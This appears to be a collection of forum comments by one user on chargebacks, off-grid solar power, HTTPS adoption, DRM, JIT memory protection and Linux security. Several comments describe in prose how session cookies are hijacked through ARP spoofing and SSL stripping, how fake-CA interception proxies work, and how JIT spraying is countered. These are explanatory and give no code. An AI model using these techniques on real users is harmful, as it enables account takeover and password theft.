Yep. One of the few times I issued a chargeback (HP laptop repair by manufacturer due to a non-functional video card; the service request explicitly did not include the hard drive but they took it out, (supposedly) destroyed it, and replaced it with an OEM imaged one; fortunately it was a dual-drive laptop and all my data was on the second drive which I'd removed prior to sending it in) the vendor (HP) tried to contest it. After an annoying phone call with my CC company (Visa through Wells Fargo, which I do not recommend) I faxed them the repair order (clearly stating not to touch the HDD), repair receipt (which clearly stated what they'd done to the HDD), and a printout of the IM transcript where their service agent had assured me they wouldn't touch the hard drive. Not *quite* the only time I've had to send a fax in the last ten years, but close.

Anyhow, got the charge for the service reversed, but I did have to prove they had failed to uphold their service agreement to the terms that I'd paid for.

Incidentally, this was after going through numerous complaints with the service center itself (where they used the laughable argument of an analogy to car repair. I had recently had a significant amount of car repair, which by law includes a very detailed statement of what things are and are not to be replaced, itemized costs, and a stipulation that all replaced parts must be available for return to the owner (i.e. no destroying them without the owner explicitly asking you to). I also filed a report with the BBB. This is all from back in 2008 though, and the laptop actually still works so I have no other significant complaint about HP.

Ah, I didn't realize. I assume they're still used for major transactions like buying a car or something?

I live in the USA, but aside from rent and occasionally paying a friend for something expensive I haven't used a check since graduation except to pay rent and buy my car.

Speaking as somebody who has spent year living on a sailboat where electricity was entirely provided by solar:

Even within a few miles of the equator, at local noon, a good rain squall will drop PV production to under 20% of its normal amount at that time. Later (or earlier) in the day it can easily drop all the way to effective zero - the charge controller eats a bit - until the sky clears. Of course, on the tropical ocean, "until the sky clears" is usually not that long. We (well, "they" now; my parents still live aboard but I do not) can run for a couple days (if fully charged) just living off the battery bank, though that would drop its charge lower than we like to let it go. On a really rainy day we might only get about 1/4 the normal production; if that keeps up for three days or so we'll run the engine for an hour to juice the batteries up.

As for winter, the biggest problem is not the angle of the sun (that is *a* problem, even if you tilt the panels, because of atmospheric losses... but it's not a huge problem) but instead is the length of the day. You might get 80% of summer noon on a sunny winter noon in some places (I doubt it would be true up here in the Pacific Northwet, and no, that's not a typo), but the boat has never been anywhere that *has* a "winter" so I can't speak from experience. However, on an average tropical Caribbean day, I measured meaningful power from 7:30 AM to 5:30 PM (10 hours total), with peak output around 1PM. That's only ten hours of electricity generation, and the vast majority of it occurred between 9:30 AM and 4 PM, for a period of only 6.5 hours (call it 2/3 of the day) where the panels produced more than 50% of their typical mid-day maximum. In Seattle in the middle of winter, we don't even get close to 10 hours of daylight; I wouldn't be surprised if we didn't get more than 6.5 hours of usable light at all. So, 2/3 as much time, multiply by 4/5 for lost brightness even at midday, and you're looking at barely over half the power per day in winter that you get from peak summer brightness. Take into account the fact that tropical days are shorter than summer days, and it looks even worse for a comparison of winter vs. summer.

Checks (cheques, this being a British hotel) do still exist, but yeah, that would still be pretty much a death knell. The only time I don't pay for a hotel online (with my credit card) is if I'm in a place so remote I either don't get cell signal or they aren't listed on the online booking sites. Even in most of those places, though, I pay with my card. The only time in the last decade I've paid cash for lodging was a few "tea houses" in the Himalayas, most of which didn't even have electricity (maybe one solar panel, battery, and a light over the kitchen/dining area).

A) WTF do you mean, "nearly worthless"? It'll mean what it does today: the connection is secured using SSL/TLS. Nothing more and nothing less. HTTPS isn't some special indication that a site is Serious Business or something. It just means that an eavesdropper can't listen in on the connection or intercept the traffic. If you *REALLY* think there's value in that distinction, though, Extended Validation certs (green URL bar) will still exist to take money from people like you.
B) Vaguely possible, but not something I'm really worried about. If their server is so insecure that the data they send is easily exposed, then they probably wouldn't have cared about what data they were or were not sending in the first place. Besides, that's *still* better than having *all* the data (including authentication data) be sent in plain text!
C) Bullshit. There are many ways around that. The easy (obvious, to anybody who knows anything about the subject) one is to fake up your own CA, install its certificate, and use a proxy server that serves up faked certs signed by your faked up CA. Burp Suite and Fiddler (two common web proxy tools, the first of which is explicitly intended for web security testing) already support doing this and have supported it for years.

i) How do you think it'll do that? The technique these people are using to authenticate domain ownership is better than what some existing "trusted" CAs use...
ii) Cry me a fucking river. The world will not miss them.
iii) See previous points, including the ones that express "WTF are you talking about?".

Authority: I've been in the information security and penetration testing profession, including lots of tests of web apps, web services, and mobile apps, since 2006.

Actually, there's a pretty damn good reason why Slashdot *should* be private:

You (and I) are logged into this site. That means a unique identifier tied to our Slashdot accounts is sent to the server (in a cookie) with every request we make. This lets Slashdot know who we are, primarily for when we post a comment. The problem is, this unique identifier is sent in plain text; anybody on the same network as you or anywhere in the network between you and Slashdot's servers can see it.

Now, I don't know about you, but it's not *that* hard to get from my Slashdot identity to my real name. I assume everything I post here can be traced back to me. I'm OK with that; if I wanted to post something privately (and for some reason didn't want to post AC) I'd create and use a throwaway account, possibly via TOR + an additional proxy redirect at an Internet café or something (Slashdot blocks known TOR exit nodes, if I recall correctly). However, just because I'm OK with the posts I make being traceable to me does *not* mean I'm OK with just anybody who wants to posting in my name.

Right now, if you and I were on the same local network (wireless or wired), I could use techniques such as ARP spoofing or DNS poisoning to intercept every HTTP request you send to Slashdot, an every response it sends you. I could extract your authentication cookie and use it to make requests that Slashdot would think come from you and would post under your username. I could even have an excellent chance to steal your password; all I would have to do is modify Slashdot's responses to make it look like you aren't signed in. Then, when you go to the login page (which normally sends your password via HTTPS, but is itself served over HTTP), I use a technique called SSL Stripping to modify the login form so that it submits your password over plain-text HTTP (I could then submit that password to Slashdot over HTTPS, as it expects). Now I have your username and password, I can modify your account, I can post as you, and odds are you don't even know you were compromised.

None of that even requires any special skill, not even basic coding. The tools to do it all are pre-built and available for free download.

Well, or you could STOP BUYING DRM SHIT instead, too. If Steam can take away your game library (and they can, and sometimes will) then they're DRM and they're shit, plain and simple. I do not get all this fawning over Steam that I see from so many people in what's normally a very anti-DRM community.

This is why I don't drop a lot of money on a game unless I've been able to trial it. Not pirate it, just trial it. There are, in fact, game devs that release trials of their games.

Most single-player RPGs and adventure games do not, which is kind of odd because it should be pretty easy to figure out a point (in either time or game progression) where if the player is enjoying the game they'll be hooked but which still leaves lots of content. Conversely, damn near all MMOs do offer such a trial, typically with a level cap and/or time cap. While I'm well aware of the differences between MMOs and single-player games, I don't understand why the big devs are so aware of the "get them hooked and they'll pay up" system for MMOs but don't take the obvious adaptation for single-player games.

Well, unless they know their games are shit and don't want people to know that before they buy. But that still doesn't justify pirating the game, just watch other people play (friends or reviewers), or borrow from a friend if possible.

No, PC browsers (with the possible exception of Safari?) don't do anything nearly so braindead, nor do any of the other kinds of PC software that use a JIT (a few examples: Java, .NET, Flash). You allocate the memory, with pages mapped R/W. You emit JIT-compiled code into a page. You re-map the page to R/X! Repeat as more pages are needed. You never, even have a R/W/X page.

In fact, browsers (IE and Chrome at a minimum, probably others) and Flashplayer take things a step further. Since you can generate a huge number of almost-entirely-attacker-controlled instructions by doing operation that will compile down as arithmetic on immediate values (constants), and since x86 (and, to a lesser extent, many ARM systems courtesy of THUMB-2 mode) allows code to be interpreted as a completely different instruction sequence if you enter the binary stream in the middle of an instruction, one technique for getting executable-mapped shellcode into a browser is to have a script that does a ton of arithmetic on carefully chosen constants. Therefore, the above-mentioned JITs (IE, Chrome, Flashplayer, maybe others) use a technique called "constant blinding" where every constant operation is actually emitted as two instructions: a masked constant getting XORed with its mask value to produce the expected constant (in a register), and then an operation on that value. No long sequence of known instructions with attacker-controlled immediates means no way to predict the result of entering an instruction stream at an offset.

If Safari on iOS really is so stupid as to have R/W/X pages just because of its JIT, Apple has fucked up colossally.

On the one hand, that shows off an impressive level of detail, with the eyeballs (not just the very fronts of the eyes) as their own models, for example.
On the other hand, WTF? I mean, I've seen games with graphics glitches like that before, usually when there's a video driver issue, so maybe it's just that... but I would expect they could afford to test on the current swath of video cards and at least the most *common* driver selections...

Microsoft also just (today) announced a new edition of VS 2013, called "Community", that is free (like the old Express editions) but is "full-featured" and supports both extensions and multiple languages. In fact, it comes with support for building iOS and Android apps built in, which kind of astonished me.

As far as I can tell, the only difference between Community and Professional, aside from the present of a purchase price, is that Comm is "for non-enterprise application development". I'm not sure where something crosses the line into being an "enterprise", but I think it's quite fair to say you can write and publish mobile apps (including iOS or Android mobile apps) with this as a hobby or independent developer.

http://www.visualstudio.com/en...

Run Linux the same way (far too) many people run Windows, and you'll find it's not that much better, security-wise. Sure, Linux doesn't make downloaded files executable by default... which is why we have http://curlpipesh.tumblr.com/ (or rather, the examples it provides). Linux doesn't run everything as root (unless you run as root, which 10 years ago was "WTF?!? Nobody would do that" and today is becoming more and more common just as it is on Windows) but then, neither does Windows... unless you do something about as intelligent as logging into your Linux system as root (and people do it all the time nonetheless). Besides, not being root isn't a guarantee of any safety; you can do a lot of damage as a normal user. Package managers should, in theory, keep people from falling for "your Flash player is out of date, you need to install this update to view the video" malware, but people who are using Linux the same way they use Windows will install third-party software from outside the repos often enough; most of the commercial Linux games I've seen, for example, require doing this.

Linux is definitely less *targeted* by run-of-the-mill malware, especially the stuff that looks to exploit the day-to-day user, but that doesn't make it more secure. Most of the Flashplayer and Adobe Reader and Java exploits out there can be exploited on Linux just as well as on Windows, but nobody bothers to do so because there isn't any return on the investment (malware is about making money, in nearly every case relevant to a home user). The recent slew of decades-old security vulns in such core packages as bash and X11 (to say nothing of OpenSSL) show that the whole "many eyes" theory doesn't actually mean that open source software is inherently well security-reviewed.

Not sure if you're joking or not... that's literally the plan of the Mars One people (the reality show, not necessarily the death pool). That's how they plan to fund the colony.

So, what prevents this hypothetical 17-year-old from presenting a forged stripping license? I mean, they could check with the licensing agency to see if a given license is valid... but hey, you can do that with a driver's license (or non-driver ID, or passport, or military ID, or whatever other form of government-issued photo ID you care to mention). Why do you need a *different* state-issued piece of paper to provide the same information?

Your scenario describes a situation where the club owners have reason to be concerned about the "legitimacy" of their dancers. Fine, let them submit the paperwork and review the information verifying the valid state-issued ID themselves. YOU DON'T NEED A NEW FORM OF STATE-ISSUED LICENSE FOR THIS! Seriously, it's not that hard to understand. These licenses provide *no* benefit. A concerned business owner could (easily) verify age without it, and an unconcerned one wouldn't give a fuck about the stripping license anyhow.

Come back when you have a non-bullshit excuse.

Leaving aside the issue of whether (voluntary) prostitution ought to be the government's concern at all, I still don't see why this requires public records. Want to know the person's age? Ask to see their government-issued photo ID. Driver's licenses, non-driver ID, passports, and so forth all already exist for (among others) that exact purpose. Yes, they can be forged, but what about a driver's license is more forgeable than a nude dancing license? As for criminal background checks, those are a standard part of many hiring processes.

There's no need to license and track this particular form of occupation specifically. None at all.